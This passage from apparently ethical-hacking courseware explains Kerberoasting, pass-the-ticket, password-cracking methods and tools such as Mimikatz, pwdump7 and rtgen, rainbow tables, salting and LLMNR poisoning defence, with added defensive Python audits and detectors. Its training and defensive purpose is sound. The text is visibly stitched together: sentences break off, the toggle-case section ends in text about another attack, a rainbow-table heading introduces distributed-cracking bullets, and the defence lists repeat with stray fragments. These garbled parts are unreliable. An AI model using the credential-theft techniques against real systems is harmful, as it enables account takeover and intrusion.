2. The domain controller verifies the user account and replies with an encrypted TGT.
3. With a valid user authentication ticket (TGT), the attacker requests the TGS.
4. The domain controller verifies the TGT and replies with a TGS ticket.
5. The attacker stores the TGS ticket offline and cracks it to extract the service account password and further access the network entity (here, the application server).

Figure 6.16: Kerberoasting (attacker, domain controller/KDC, application server)
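Both attacks above depend on account settings that a defender (or an attacker enumerating the directory) can read from Active Directory: AS-REP roasting needs the userAccountControl flag DONT_REQUIRE_PREAUTH (0x400000), and Kerberoasting needs an enabled user account with a servicePrincipalName, made worse when RC4 is among the allowed encryption types, because the ticket is then keyed by the NTLM hash. The audit below is an added example (not courseware code) over constructed account records shaped like LDAP attributes; the accounts are invented, and treating an unset msDS-SupportedEncryptionTypes as RC4 only reflects the historical default and is an assumption made here.

```python
"""Audit exported AD user attributes for AS-REP-roastable and Kerberoastable accounts.
Added example; not courseware code. Records are constructed, shaped like LDAP attributes."""
UF_ACCOUNTDISABLE = 0x0002
UF_DONT_REQUIRE_PREAUTH = 0x400000          # "Do not require Kerberos preauthentication"
ETYPE_RC4_HMAC, ETYPE_AES128, ETYPE_AES256 = 0x4, 0x8, 0x10   # msDS-SupportedEncryptionTypes bits

ACCOUNTS = [  # constructed sample directory export
    {"sAMAccountName": "alice", "userAccountControl": 0x10200, "servicePrincipalName": [],
     "msDS-SupportedEncryptionTypes": 0x18},
    {"sAMAccountName": "legacyapp", "userAccountControl": 0x10200 | UF_DONT_REQUIRE_PREAUTH,
     "servicePrincipalName": [], "msDS-SupportedEncryptionTypes": None},
    {"sAMAccountName": "svc_sql", "userAccountControl": 0x10200,
     "servicePrincipalName": ["MSSQLSvc/db01.corp.local:1433"], "msDS-SupportedEncryptionTypes": None},
    {"sAMAccountName": "svc_web", "userAccountControl": 0x10200,
     "servicePrincipalName": ["HTTP/web01.corp.local"], "msDS-SupportedEncryptionTypes": 0x18},
    {"sAMAccountName": "old_svc", "userAccountControl": 0x10200 | UF_ACCOUNTDISABLE | UF_DONT_REQUIRE_PREAUTH,
     "servicePrincipalName": ["CIFS/fs-old.corp.local"], "msDS-SupportedEncryptionTypes": None},
    {"sAMAccountName": "krbtgt", "userAccountControl": 0x10202,
     "servicePrincipalName": ["kadmin/changepw"], "msDS-SupportedEncryptionTypes": 0x1c},
]


def is_enabled(acct) -> bool:
    return not (acct["userAccountControl"] & UF_ACCOUNTDISABLE)


def asrep_roastable(acct) -> bool:
    """Pre-authentication disabled on an enabled account: an AS-REQ carrying no proof of the
    password still returns material encrypted under the password-derived key."""
    return is_enabled(acct) and bool(acct["userAccountControl"] & UF_DONT_REQUIRE_PREAUTH)


def ticket_etype(acct) -> str:
    """Strongest ticket key the KDC can use for this account. An unset attribute is treated
    as RC4 only (the historical default, an assumption); AES tickets are not keyed by the NT hash."""
    bits = acct.get("msDS-SupportedEncryptionTypes") or ETYPE_RC4_HMAC
    if bits & ETYPE_AES256:
        return "AES256"
    if bits & ETYPE_AES128:
        return "AES128"
    return "RC4"


def kerberoastable(acct) -> bool:
    """Any authenticated user can request a service ticket for an enabled user account that has an
    SPN; krbtgt is excluded because its ticket is the TGT itself, not a service ticket target."""
    return (is_enabled(acct) and bool(acct["servicePrincipalName"])
            and acct["sAMAccountName"].lower() != "krbtgt")


def audit(accounts) -> dict:
    """Return both finding lists; Kerberoast findings carry the ticket key type, since an RC4
    ticket (one MD4 per guess) cracks far faster than an AES one (PBKDF2 per guess)."""
    asrep = [a["sAMAccountName"] for a in accounts if asrep_roastable(a)]
    roast = [(a["sAMAccountName"], ticket_etype(a)) for a in accounts if kerberoastable(a)]
    return {"asrep_roastable": asrep, "kerberoastable": roast}


if __name__ == "__main__":
    for finding, names in audit(ACCOUNTS).items():
        print(finding, names)
```

In a real directory the same checks are an LDAP query with the filters (userAccountControl:1.2.840.113556.1.4.803:=4194304) and (&(objectCategory=person)(servicePrincipalName=*)); the remediation for the first finding is re-enabling pre-authentication, and for the second a long random service account password (or a group Managed Service Account) together with AES-only encryption types.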
Pass-the-Ticket Attack

Pass-the-ticket is a technique used for authenticating a user to a system that is using Kerberos tickets without providing the user's password. Kerberos authentication allows users to access services provided by remote servers without the need to provide passwords for every requested service. To perform this attack, the attacker dumps Kerberos tickets of legitimate accounts using credential dumping tools.

A TGT or ST can be captured based on the level of access permitted to a client. Here, the ST permits access to specific resources, and the TGT is used to send a request to the TGS for the ST to access all the services the client has been authorized to access.

Silver Tickets are captured for resources that use Kerberos for the authentication process, and can be used to create tickets to call a specific service and access the system that offers the service.

Golden tickets are captured for the domain with the KDC KRBTGT NTLM hash that allows the creation of TGTs for any profile in the Active Directory.
Attackers launch pass-the-ticket attacks either by stealing the ST/TGT from an end-user machine and using it to disguise themselves as a valid user, or by stealing the ST/TGT from a compromised AS. After obtaining one of these tickets, an attacker can gain unauthorized access to the network services and search for additional permissions and critical data.

Attackers use tools such as Mimikatz, Rubeus, Windows Credentials Editor, etc. to launch pass-the-ticket attacks:

- Mimikatz
  Source: https://github.com
  Mimikatz allows attackers to pass a Kerberos TGT to other computers and sign in using the victim's ticket. The tool also helps in extracting plaintext passwords, hashes, PIN codes, and Kerberos tickets from memory. It is an open-source tool that enables anyone to see and store authentication data such as Kerberos tickets. Attackers can leverage this for privilege escalation and credential stealing.

Figure 6.17: Screenshot of Mimikatz
Other Active Online Attacks

1. Find a valid target user.
2. Build your own two dictionaries or download two different wordlist dictionaries from online sources.
3. Create a final wordlist by merging entries of the two separate dictionaries. For example, if the first dictionary contains 100 words and the second dictionary contains 70 words, then the merged dictionary contains 100 x 70 = 7000 words.
4. Use automated tools, such as hashcat, to crack the password of the target user.

Fingerprint Attack

Attackers perform this type of password cracking in a situation where a random phrase of words is used as a default password generation procedure. In a fingerprint attack, the passphrase is broken down into fingerprints consisting of single- and multi-character combinations that a target user might choose as his/her password. For example, for the word "password", this technique would create
fingerprints such as "p", "a", "s", "s", "w", "o", "r", "d", "pa", "ss", "wo", "rd", etc. Attackers usually perform this attack to crack complex passwords such as "pass-10". To perform this attack, attackers create a list of unique password hashes from a leaked password hash database, and then perform a brute-force attack to obtain a wordlist and further start the fingerprint attack.

PRINCE Attack

A PRobability INfinite Chained Elements (PRINCE) attack is an advanced version of a combinator attack in which, instead of taking inputs from two different dictionaries, attackers use a single input dictionary to build chains of combined words. This chain can have between 1 and n words from the input dictionary concatenated together to form a chain of words. For example, if the length of characters to be guessed is 5, then the following combinations are created from the input dictionary:

- 5-letter word
- 3-letter word + 2-letter word
- 2-letter word + 3-letter word
- 1-letter word + 4-letter word
- etc.
Toggle-Case Attack

In a toggle-case attack, attackers try all possible upper-case and lower-case combinations of a word present in the input dictionary. For example, if a word in the input dictionary is "xyz", the following set of combinations is generated:

- xyz
- Xyz
- xYz
- xyZ
- XYz
- etc.

The success rate of this attack is low for the following reasons:

- If users use upper-case letters,
a new alphabet of character elements is developed, which is then matched with the existing password database. In the initial phase of this attack, attackers set a threshold parameter for the occurrences of the elements, and only the letters present in the new alphabet that occurred at least the minimum number of times are selected. Furthermore, this technique combines the selected letters into words with a maximum length of eight characters, and then a dictionary attack is performed to crack the target password.
Passive Online Attacks: Wire Sniffing

- Attackers run packet sniffer tools on the local area network (LAN) to access and record the raw network traffic
- The captured data may include sensitive information such as passwords (FTP, login sessions, etc.) and emails
- Sniffed credentials are used to gain unauthorized access to the target system
- Wire sniffing is computationally complex and hard to perpetrate
Passive Online Attacks: Man-in-the-Middle and Replay Attacks

- In an MITM attack, the attacker acquires access to the communication channels between the victim and the server to extract the information needed
- In a replay attack, packets and authentication tokens are captured using a sniffer; after the relevant information is extracted, the tokens are placed back on the network to gain access
- Considerations: relatively hard to perpetrate; must be trusted by one or both sides; can sometimes be broken by invalidating traffic
Passive Online Attacks

Wire Sniffing

Packet sniffing is a form of wire sniffing or wiretapping in which hackers sniff credentials during transit by capturing Internet packets. Attackers rarely use sniffers to perform this type of attack. With packet sniffing, an attacker can gain passwords to applications such as email, websites, SMB, FTP, rlogin sessions, or SQL. As sniffers run in the background, the victim remains unaware of the sniffing.
Using sniffers, attackers can capture data sent to and from any other system on the LAN. The majority of sniffer tools are ideally suited to sniff data in a hub environment. These tools are passive, as they passively wait for data transfer before capturing the information. They are efficient at imperceptibly gathering data from the LAN. The captured data may include passwords sent to remote systems during FTP, rlogin sessions, and electronic mail. The attacker uses these sniffed credentials to gain unauthorized access to the target system. There are a variety of tools available on the Internet for passive wire sniffing.
Man-in-the-Middle and Replay Attacks

When two parties are communicating, a man-in-the-middle (MITM) attack can take place, in which a third party intercepts a communication between the two parties without their knowledge. The third party eavesdrops on the traffic and then passes it along. To do this, the "man in the middle" has to sniff from both sides of the connection simultaneously. In an MITM attack, the attacker acquires access to the communication channels between the victim and server to extract the information. This type of attack is often used in telnet and wireless technologies. It is not easy to implement such attacks owing to the TCP sequence numbers and the speed of the communication. This method is relatively hard to perpetrate and can sometimes be broken by invalidating the traffic.
Offline Attacks: Rainbow Table Attack

- A Distributed Network Attack (DNA) is a technique used for recovering passwords from hashes or password-protected files using the unused processing power of machines across the network
- The DNA Manager coordinates the attack and allocates small portions of the key search to machines distributed across the network
- The DNA Client runs in the background, consuming only unused processor time
- The program combines the processing capabilities of all the clients connected to the network and uses it to crack the password
Offline Attacks

Offline attacks occur when the intruder checks the validity of passwords. He/she observes how the password is stored. If the usernames and passwords are stored in a readable file, it becomes easy for the attacker to gain access to the system. Hence, it is important to protect the list of passwords and keep it in an unreadable form, preferably encrypted.
Offline attacks, although time-consuming, are successful because of the small keyspace and short length of the passwords they target. Notably, different password-cracking techniques are available on the Internet. Two examples of offline attacks are as follows:

1. Rainbow table attack
2. Distributed Network Attack

Rainbow Table Attack

A rainbow table attack uses the cryptanalytic time-memory trade-off technique, which requires less time than other techniques. It uses already-calculated information stored in memory to crack the encryption. In the rainbow table attack, the attacker creates a table of all the possible passwords and their respective hash values, known as a rainbow table, in advance.
Figure 6.20: Pre-computed hashes (a table of sample plaintexts beside their hash values)
Attackers use the rtgen tool of this project to generate the rainbow tables. As shown in the screenshot, the rtgen program needs several parameters to generate a rainbow table. The syntax of the command line is:

Syntax: rtgen hash_algorithm charset plaintext_len_min plaintext_len_max table_index chain_len chain_num part_index

Figure 6.21: Generating a rainbow table with rtgen

Distributed Network Attack
A Distributed Network Attack (DNA) is a technique used for recovering password-protected files that utilizes the unused processing power of machines spread across the network to decrypt passwords. In this attack, the attacker installs a DNA manager in a central location where machines running DNA clients can access it over a network. The DNA manager coordinates the attack and assigns small portions of the key search to machines distributed throughout the network. The DNA client runs in the background, only taking the processor time that was unused. The program combines the processing capabilities of all the clients connected to the network and uses it to crack the password. Attackers use the Password Recovery Toolkit (PRTK), which is equipped with DNA tools, to perform this attack.

The features of a DNA are as follows:

- Easily reads statistics and graphs
- Adds user dictionaries to crack a password
- Optimizes password attacks for specific languages
- Modifies the user dictionaries
- Comprises stealth client installation functionality
- Automatically updates the client while updating the DNA server
DNA can be classified into two modules:

DNA Server Interface

The DNA server interface allows users to manage DNA from a server. The DNA server module provides the user with the status of all the jobs that the DNA server is executing. The interface contains the following job lists:

- Current Jobs: The current job queue consists of all the jobs added to the list by the controller. The current job list has many columns, such as the identification number assigned by the DNA to the job, the name of the encrypted file, the user's password, the password that matches a key that can unlock the data, the status of the job, and various other columns.
- Finished Jobs: The finished job list provides information about the decryption jobs, including the password. It also has many columns that are similar to the current job list. These columns include the identification number assigned by DNA to the job, the name of the encrypted file, the decrypted path of the file, the key used to encrypt and decrypt the file, the date and time that the DNA server started working on the job, the date and time the DNA server finished working on the job, the elapsed time, etc.

DNA Client Interface

Users can use the DNA client interface from many workstations. The interface helps the client coordinate statistics easily and is available on machines with the pre-installed DNA client application. There are several components, such as the name of the DNA client, the name of the group to which the DNA client belongs, and the statistics about the current job.
Network Management

The Network Traffic dialog box aids in the discovery of the network speed the DNA uses and each work-unit length of the DNA client. Using the work-unit length, a DNA client can work without contacting the DNA server; the DNA client contacts the DNA server at the beginning and the end of the work-unit length. As the work-unit length increases, the speed of the network traffic decreases. A decrease in the speed of the traffic leads the client to spend longer amounts of time working on the jobs. Therefore, the user can make fewer requests to the server because of the reduction in the bandwidth of network traffic.
Password Recovery Tools

Password recovery tools allow attackers to break complex passwords, recover strong encryption keys, and unlock several documents.

- Elcomsoft Distributed Password Recovery
  Source: https://www.elcomsoft.com
  The Elcomsoft Distributed Password Recovery application allows attackers to break complex passwords, recover strong encryption keys, and unlock documents in a production environment. Attackers can use this tool to recover the passwords of the target system to gain unauthorized access to the critical files and other system software.
Figure 6.22: Screenshot of Elcomsoft Distributed Password Recovery

Some of the password recovery tools are listed as follows:

- Password Recovery Toolkit (https://accessdata.com)
- Passware Kit Forensic (https://www.passware.com)
- hashcat (https://hashcat.net)
- Windows Password Recovery Tool (https://www.windowspasswordsrecovery.com)
- PCUnlocker (https://www.top-password.com)
Tools to Extract the Password Hashes

- pwdump7
  pwdump7 extracts LM and NTLM password hashes of local user accounts from the Security Account Manager (SAM) database.
As shown in the screenshot, attackers use this tool to extract password hashes from the target system.

Figure 6.23: Screenshot of pwdump7

Some of the additional tools to extract password hashes are as follows:

- Mimikatz (https://github.com)
- PowerShell Empire (https://github.com)
- DSInternals PowerShell (https://github.com)
- Ntdsxtract (https://github.com)

Note: The use of the above tools requires administrative privileges on the remote system.
Password-Cracking Tools: L0phtCrack and ophcrack

Password-cracking tools such as L0phtCrack, ophcrack, RainbowCrack, and hashcat allow you to reset unknown or lost Windows local administrator, domain administrator, and other user account passwords. In the case of forgotten passwords, they even allow users instant access to their locked computer without reinstalling Windows. Attackers can use password-cracking tools to crack the passwords of the target system.
Some password-cracking tools are listed as follows.

- L0phtCrack
  Source: https://www.l0phtcrack.com
  L0phtCrack is a tool designed to audit passwords and recover applications. It recovers lost Microsoft Windows passwords with the help of dictionary, hybrid, rainbow table, and brute-force attacks, and it also checks the strength of the password. As shown in the screenshot, attackers use L0phtCrack to crack the password of the target to gain access to the system.

Figure 6.24: Screenshot of L0phtCrack
- ophcrack
  Source: http://ophcrack.sourceforge.net
  ophcrack is a Windows password-cracking tool that uses rainbow tables for cracking passwords. It comes with a graphical user interface (GUI) and runs on different OSs such as Windows, Linux/UNIX, etc. As shown in the screenshot, attackers use ophcrack to perform brute-force attacks and crack password hashes of the target system.

Figure 6.25: Screenshot of ophcrack
- RainbowCrack
  Source: http://project-rainbowcrack.com
  RainbowCrack cracks hashes with rainbow tables, using a time-memory trade-off algorithm. A traditional brute-force cracker cracks hashes in a manner that is different from that followed by a time-memory trade-off hash cracker. The brute-force hash cracker tries all possible plaintexts one after the other during cracking. In contrast, RainbowCrack pre-computes all the possible plaintext-hash pairs in the selected hash algorithm, charset, and plaintext length in advance and stores them in a "rainbow table" file. It may take a long time to pre-compute the tables, but once the pre-computation is finished, it is possible to easily and quickly crack the ciphertext using the rainbow tables. As shown in the screenshot, attackers use RainbowCrack to crack the password hashes of the target system.
Password Salting

Password salting is a technique in which random strings of characters are added to a password before calculating the hashes. This makes it more difficult to reverse the hashes and helps in defeating pre-computed hash attacks. The longer the random string, the harder it becomes to break or crack the password. The random string of characters should be a combination of alphanumeric characters.

In cryptography, a "salt" consists of random data bits used as an input to a one-way function, the other input being a password. Instead of passwords, the output of the one-way function can be stored and used to authenticate users. A salt combines with a password by a key derivation function to generate a key for use with a cipher or other cryptographic algorithm. This technique generates different hashes for the same password, which renders password cracking difficult.
Figure 6.27: Example of password salting (Alice, Bob, and Cecil share the same password but, because of their different salts, store different hashes)

Note: Windows password hashes are not salted.
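To make concrete both the rainbow table attack described earlier and the reason salting defeats it, here is an added example that is not code from the courseware: a pre-computed table of unsalted hashes (the rainbow-table idea in miniature, with plain SHA-256 standing in for the unsalted NTLM hash the note mentions) recovers a stored hash with one lookup, while the same table is useless against a per-user salted PBKDF2 digest. The candidate list and the user records are constructed samples.

```python
"""Added example (not the courseware's code): a pre-computed hash -> plaintext
table against unsalted hashes, and the same table failing against salted
PBKDF2 records. SHA-256 stands in for whatever unsalted hash a store uses;
CANDIDATES and the users are constructed samples."""
import hashlib
import hmac
import os

# Constructed candidate list. The attack pays the hashing cost once, in
# advance, and reuses the table against every captured hash.
CANDIDATES = ["password", "letmein", "qwerty", "rosewood", "apple"]


def unsalted_hash(password):
    """How an unsalted password store records a password."""
    return hashlib.sha256(password.encode()).hexdigest()


# The pre-computed table: every candidate's hash, keyed for instant lookup.
PRECOMPUTED = {unsalted_hash(p): p for p in CANDIDATES}


def lookup_precomputed(stored_hash):
    """One dictionary lookup recovers any unsalted hash that is in the table."""
    return PRECOMPUTED.get(stored_hash)


def make_salted_record(password, iterations=100_000):
    """Store a fresh random 16-byte salt beside a PBKDF2-HMAC-SHA256 digest.
    Two users with the same password get different digests, so an attacker
    would need a separate pre-computed table for every salt value, and the
    iteration count makes each table expensive to build."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return {"salt": salt.hex(), "iterations": iterations, "digest": digest.hex()}


def verify_salted(password, record):
    """Recompute with the stored salt and compare in constant time."""
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(record["salt"]), record["iterations"]
    )
    return hmac.compare_digest(digest.hex(), record["digest"])
```

The lookup against the unsalted store succeeds immediately for any candidate in the table; the lookup against a salted record never does, because the digest depends on a salt the table builder did not know. A production store would use a memory-hard KDF such as Argon2 or scrypt where available, but the salt-per-user principle is the same.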
How to Defend against Password Cracking

- Use an information security audit to monitor and track password attacks
- Disallow the use of the same password during password change
- Disallow the use of passwords found in a dictionary
- Disallow the use of cleartext protocols and protocols with weak encryption
- Avoid storing passwords in an unsecured location
- Do not use any system default passwords
- Ensure that applications neither store passwords in memory nor write them to disk
- Use a random string (salt) as a prefix or suffix to the password before encryption
- Disallow the use of passwords such as date of birth, spouse, child, etc.
- Monitor the server's
How to Defend against Password Cracking (Cont'd)

- protected on devices that are susceptible to physical threats
- Train employees to thwart social engineering tactics such as shoulder surfing and dumpster diving, which are used to steal credentials
- Perform password screening when new passwords are created to avoid using commonly used passwords
- Use two-factor or multi-factor authentication, for example, using CAPTCHA to prevent automated attacks
- Secure and control physical access to systems to prevent offline password attacks
- Ensure that the password databases are encrypted and accessible only to system administrators
- Mask the display of passwords on the screen to avoid shoulder surfing attacks
- Enable an information security audit to monitor and track password attacks.
- Do not use the same password during the password change.
- Do not share passwords.
- Do not use passwords that can be found in a dictionary.
- Do not use cleartext protocols or protocols with weak encryption.
- Set the password change policy to 30 days.
- Avoid storing passwords in an unsecured location.
- for each individual, it is impractical for attackers to construct tables with a single encrypted version of each candidate password. UNIX systems typically use a 12-bit salt.
- Enable SYSKEY with a strong password to encrypt and protect
- Check any suspicious application that stores passwords in memory or writes them to disk.
- Unpatched systems can reset passwords during buffer overflow or denial-of-service attacks. Make sure to update the system.
- Examine whether the account is in use, deleted, or disabled. Disable the user account if multiple failed login attempts are detected.
- to physical threats, such as servers and laptops.
- Train employees to thwart social engineering tactics, such as shoulder surfing and dumpster diving, which are used to steal credentials.
- Configure password policies under the Group Policy object in the Windows OS.
- Perform password screening when new passwords are created to avoid using commonly used passwords.
- Use two-factor or multi-factor authentication, for example, use CAPTCHA to prevent automated attacks on critical information systems.
- Secure and control physical access to systems to prevent offline password attacks.
- Ensure password database files are encrypted and accessible only by system administrators.
- Mask the display of passwords on screen to avoid shoulder-surfing attacks.
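The password screening the defence list calls for is only useful if it screens against what the attacks described earlier actually enumerate. The following is an added example, not code from the courseware, that rejects a proposed password when it lies in the candidate space of the combinator, toggle-case, or PRINCE attack for a given wordlist; WORDLIST is a constructed sample and a real screener would load a large leaked-password list.

```python
"""Added example (not from the CEH courseware): screen a proposed password
against the candidate spaces of the combinator, toggle-case and PRINCE
attacks. WORDLIST is a constructed sample dictionary."""
from itertools import product

WORDLIST = ["pass", "word", "xyz", "admin", "10"]   # constructed sample


def toggle_case_variants(word):
    """Toggle-case attack: every upper/lower-case spelling of `word`,
    2**(number of letters) candidates; non-letters have one form."""
    choices = [(c.lower(), c.upper()) if c.isalpha() else (c,) for c in word]
    return {"".join(p) for p in product(*choices)}


def combinator_candidates(first, second=None):
    """Combinator attack: each word of the first list followed by each word of
    the second, so len(first) * len(second) candidates (the 100 x 70 = 7000
    of the text). With one list the second defaults to the same words."""
    second = first if second is None else second
    return {a + b for a in first for b in second}


def prince_candidates(words, target_len, max_chain=3):
    """PRINCE attack: chains of 1..max_chain words from a single dictionary
    whose concatenated length equals target_len."""
    found = set()
    for n in range(1, max_chain + 1):
        for chain in product(words, repeat=n):
            candidate = "".join(chain)
            if len(candidate) == target_len:
                found.add(candidate)
    return found


def screen_password(password, words=WORDLIST):
    """Return the reason the password would fall to one of the attacks above,
    or None if it survives all of them."""
    lower_words = [w.lower() for w in words]
    if password in words:
        return "dictionary word"
    if any(password in toggle_case_variants(w) for w in words):
        return "toggle-case variant of a dictionary word"
    lowered = password.lower()
    if lowered in combinator_candidates(lower_words):
        return "combination of two dictionary words"
    if lowered in prince_candidates(lower_words, len(lowered)):
        return "PRINCE chain of dictionary words"
    return None
```

The check is deliberately case-insensitive for the combinator and PRINCE branches, since a cracker applies case rules on top of those candidates; for a large wordlist the candidate sets would be generated lazily or replaced by a Bloom filter rather than materialized as here.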
How to Defend against LLMNR/NBT-NS Poisoning

Disabling LLMNR

1. Open the Local Group Policy Editor.
2. Navigate to Local Computer Policy -> Computer Configuration -> Administrative Templates -> Network -> DNS Client.
3. In the DNS Client, double-click Turn off multicast name resolution.
4. Select the Enabled radio button and then click OK.

Figure 6.28: Disabling LLMNR in Windows

Disabling NBT-NS

1. Open the Control Panel, navigate to Network and Internet -> Network and Sharing Center, and click on the Change adapter settings option on the right-hand side.
2. Right-click on the network adapter and then click Properties, select TCP/IPv4, and then click Properties.
Figure 6.29: Disabling NBT-NS in Windows (Advanced TCP/IP Settings, WINS tab: the NetBIOS setting offers Default, Enable NetBIOS over TCP/IP, and Disable NetBIOS over TCP/IP)
Tools to Detect LLMNR/NBT-NS Poisoning

Network administrators and cybersecurity professionals use tools such as Vindicate, got-responded, and Respounder to detect LLMNR/NBT-NS poisoning attacks.

- Vindicate
  Source: https://github.com
  Vindicate is an LLMNR/NBNS/mDNS spoofing detection toolkit for network administrators. Security professionals use this tool to detect name service spoofing. This tool helps them to quickly detect and isolate attackers on their network. It is designed to detect the use of hacking tools such as Responder, Inveigh, NBNSpoof, and Metasploit's LLMNR, NBNS, and mDNS spoofers while avoiding false positives. It exploits the Windows event log for quick integration with an Active Directory network.
Ethical Hacking and Countermeasures, Exam 312-50 Certified Ethical Hacker: System Hacking

Figure 6.30: Screenshot showing the output of Vindicate (a Windows PowerShell session in which Vindicate reports an active WPAD service and LLMNR/NBNS responses claiming Responder, with the confidence level adjusted to Certain)
- got-responded
  Source: https://github.com
  got-responded helps security professionals to check for LLMNR/NBT-NS spoofing. This tool starts in the default mode and checks for both LLMNR and NBT-NS spoofing but does not send fake SMB credentials.
Figure 6.31: Screenshot showing the output of got-responded
- Respounder
  Source: https://github.com
  Respounder detects the presence of a responder in the network. Security professionals use this tool to identify compromised machines before hackers exploit password hashes. This tool also helps security professionals to detect rogue hosts running responder on

Figure 6.32: Screenshot showing the output of Respounder
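The detection tools listed above share one idea: ask the LLMNR multicast group for a hostname that cannot exist, and treat any host that answers as a poisoner, since no legitimate machine owns that name. The following is an added example, not the code of Vindicate, got-responded, or Respounder, that builds such a canary query and parses the reply; the response bytes used for the offline check are a constructed sample, and the multicast address and port are the standard LLMNR ones.

```python
"""Added example (not Vindicate's, got-responded's or Respounder's code): the
LLMNR canary check by hand. A query for a random hostname is sent to the
LLMNR group; any answer means a host is claiming a name it cannot own.
sample_response() builds a constructed reply purely to exercise the parser."""
import secrets
import socket
import struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355   # standard LLMNR multicast group/port
QTYPE_A, QCLASS_IN = 1, 1


def build_llmnr_query(name, txid):
    """LLMNR shares the DNS wire format: 12-byte header, then one question."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    qname = b"".join(bytes([len(lbl)]) + lbl.encode() for lbl in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", QTYPE_A, QCLASS_IN)


def parse_llmnr_response(data, txid):
    """Return the IPv4 address in the first A record of a response that
    matches `txid`, or None if the packet is not such a response."""
    if len(data) < 12:
        return None
    rid, flags, qd, an, _, _ = struct.unpack("!HHHHHH", data[:12])
    if rid != txid or not flags & 0x8000 or an == 0:   # 0x8000 = QR bit (response)
        return None
    pos = 12
    for _ in range(qd):                     # skip the echoed question(s)
        while data[pos] != 0:
            pos += data[pos] + 1
        pos += 1 + 4                        # root label + QTYPE + QCLASS
    for _ in range(an):
        if data[pos] & 0xC0 == 0xC0:        # compressed name pointer
            pos += 2
        else:
            while data[pos] != 0:
                pos += data[pos] + 1
            pos += 1
        rtype, rclass, _ttl, rdlen = struct.unpack("!HHIH", data[pos:pos + 10])
        pos += 10
        if rtype == QTYPE_A and rclass == QCLASS_IN and rdlen == 4:
            return socket.inet_ntoa(data[pos:pos + 4])
        pos += rdlen
    return None


def canary_name():
    """A random name that no legitimate host can own."""
    return "canary-" + secrets.token_hex(6)


def sample_response(txid, name, ip):
    """Constructed sample of the reply a host claiming `name` would send;
    used only for the offline check of the parser."""
    question = build_llmnr_query(name, txid)[12:]
    header = struct.pack("!HHHHHH", txid, 0x8000, 1, 1, 0, 0)
    answer = b"\xc0\x0c" + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, 30, 4) + socket.inet_aton(ip)
    return header + question + answer


def probe_for_poisoner(timeout=2.0):
    """Live check (needs network access; not run offline): send the canary
    query and return (source address, claimed address) of any responder."""
    txid = secrets.randbelow(65536)
    query = build_llmnr_query(canary_name(), txid)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(query, (LLMNR_GROUP, LLMNR_PORT))
        try:
            data, (src, _port) = sock.recvfrom(512)
        except socket.timeout:
            return None
    claimed = parse_llmnr_response(data, txid)
    return (src, claimed) if claimed else None
```

Run periodically from a monitoring host, probe_for_poisoner() turns a silent attack into an alert with the responder's source address; once LLMNR is disabled by policy as described above, the same probe is a useful check that the policy actually took effect, since nothing should answer.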
Vulnerability Exploitation

Vulnerability exploitation involves the execution of multiple complex, interrelated steps to gain access to a remote system. The steps involved are as follows:

- Identify the vulnerability
- Determine the risk associated with the vulnerability
- Determine the capability of the vulnerability
- Develop the exploit
- Select the method for delivering: local or remote
- Generate and deliver the payload
- Gain remote access
Vulnerability Exploitation

Vulnerability exploitation involves the execution of multiple complex, interrelated steps to gain access to a remote system. Attackers can perform exploitation only after discovering vulnerabilities in the target system. Attackers use discovered vulnerabilities to develop exploits and deliver and execute the exploits on the remote system.

Steps involved in exploiting vulnerabilities:

1. Identify the Vulnerability
   Attackers identify the vulnerabilities that exist in the target system using various techniques discussed in the previous modules. These techniques include footprinting and reconnaissance, scanning, enumeration, and vulnerability analysis. After identifying the OSs used and vulnerable services running on the target system, attackers also use various online exploit sites such as Exploit Database (https://www.exploit-db.com) and SecurityFocus (https://www.securityfocus.com) to detect vulnerabilities in the underlying OS and applications.

2. Determine the Risk Associated with the Vulnerability
   After identifying a vulnerability, attackers determine the risk associated with the vulnerability, i.e., whether exploitation of this vulnerability sustains the security measures on the target system.

3. Determine the Capability of the Vulnerability
   If the risk is low, attackers can determine the capability of exploiting this vulnerability to gain remote access to the target system.

4. Develop the Exploit
   After determining the capability of the vulnerability, attackers use exploits from online exploit sites such as Exploit Database (https://www.exploit-db.com), or develop their own exploits using exploitation tools such as Metasploit.

5. Select the Method for Delivering: Local or Remote
   Attackers perform remote exploitation over a network to exploit a vulnerability existing in the remote system to gain shell access. If attackers have prior access to the system, they perform local exploitation to escalate privileges or execute applications in the target system.

6. Generate and Deliver the Payload
   Attackers, as part of exploitation, generate or select malicious payloads using tools such as Metasploit and deliver them to the remote system either using social engineering or through a network. Attackers inject malicious shellcode in the payloads, which, when executed, establishes a remote shell to the target system.

7. Gain Remote Access
   After generating the payload, attackers run the exploit to gain remote shell access to the target system. Now, attackers can run various malicious commands on the remote shell and control the system.
Exploit Sites

Attackers can use various exploit sites such as Exploit Database, SecurityFocus, etc. to discover vulnerabilities and download or develop exploits to perform remote exploitation on the target system. These sites include details of the latest vulnerabilities and exploits.

- Exploit Database
  Source: https://www.exploit-db.com
  Exploit Database includes details of the latest vulnerabilities present in various OSs, devices, applications, etc. Attackers can search Exploit Database to discover vulnerabilities in the target system, download the exploits from the database, and use exploitation tools such as Metasploit to gain remote access.
Figure 6.33: Screenshot of Exploit Database

- SecurityFocus
  Source: https://www.securityfocus.com
  SecurityFocus contains a database of the recently reported cybersecurity incidents and software bugs, along with a searchable archive of common vulnerabilities and exposures (CVEs). Attackers can search SecurityFocus to detect vulnerabilities in the target OS and applications.

Figure 6.34: Screenshot of SecurityFocus

- VulDB
  Source: https://vuldb.com
  VulDB includes details of the latest vulnerabilities and exploits, rated based on the highest exploitation probability. Attackers can search the VulDB to identify vulnerabilities and exploit them or even fully automate the exploitation.

Figure 6.35: Screenshot of VulDB

- MITRE CVE
  Source: https://cve.mitre.org
  MITRE maintains a CVE database that contains details of the latest vulnerabilities. Attackers can search MITRE CVE to discover vulnerabilities that exist in the target system.

Figure 6.36: Screenshot of MITRE CVE
Buffer Overflow

